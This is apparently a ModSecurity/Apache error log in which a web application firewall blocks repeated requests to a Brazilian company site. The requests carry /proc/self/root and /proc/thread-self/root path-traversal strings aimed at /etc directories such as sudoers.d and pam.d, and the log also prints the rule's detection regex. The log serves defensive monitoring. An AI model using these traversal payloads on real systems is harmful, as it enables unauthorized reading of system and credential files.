[Tue Mar 17 08:21:48.120132 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.241.46:34396] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5TO82sZHvlq4xgHq7VgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:49.459526 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.46:38572] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5TaBJNF7axNlVR0X02wAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:50.783171 2026] [:error] [pid 5398:tid 140411641214720] [client 74.7.241.46:38584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5TgRES9pL8P-grjlgKgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:52.006397 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.46:38594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5UKBJNF7axNlVR0X03AAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:54.531933 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:38604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5UnRXaaWotPICgYscQgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:21:57.689249 2026] [:error] [pid 662:tid 140411641214720] [client 74.7.241.46:38606] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5Va60egQjobaJUYgHrgAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:22:01.550476 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:43962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5WQQohV2v-7oj5HHypwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:22:04.051397 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:43964] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5XHRXaaWotPICgYscSgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:22:22.435162 2026] [:error] [pid 5398:tid 140411708356352] [client 74.7.243.203:52680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5bgRES9pL8P-grjlgXgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:22:24.824999 2026] [:error] [pid 662:tid 140411658000128] [client 74.7.243.203:54670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5cK60egQjobaJUYgHtQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:22:26.183719 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.203:54680] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5cgeiSKl8TjouI-b6fwAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:22:27.707643 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.243.203:54690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5cxePVOt35XCGZP8lvQAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:22:40.262741 2026] [:error] [pid 5398:tid 140411590858496] [client 74.7.241.46:43976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5gARES9pL8P-grjlgbwAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:22:42.671913 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.241.46:47360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5gu82sZHvlq4xgHq7YAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:23:04.121926 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.244.31:48690] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk5mJqmL8PQht4WJFlAtQAAAVI"]
[Tue Mar 17 08:23:17.083022 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.228.16:36124] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk5pQeiSKl8TjouI-b6hwAAA8A"]
[Tue Mar 17 08:23:25.064793 2026] [:error] [pid 1210:tid 140411666392832] [client 74.7.241.46:47362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5rVKJy4A1bGlmj9BN0gAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:23:29.579586 2026] [:error] [pid 7000:tid 140411616036608] [client 74.7.241.46:50258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5sRePVOt35XCGZP8l0QAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:23:46.676089 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:36886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5wpDEJR9VXonE_-1F0gAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:23:49.264646 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.241.46:36886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5xZDEJR9VXonE_-1F2wAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:23:50.663001 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.241.46:50242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk5xu82sZHvlq4xgHq7bwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:24:13.527488 2026] [:error] [pid 32588:tid 140411557287680] [client 74.7.241.46:50258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk53S8PwvOE6ZaeZxiGowAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:24:16.114487 2026] [:error] [pid 662:tid 140411548894976] [client 74.7.241.46:44390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk54K60egQjobaJUYgHxgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
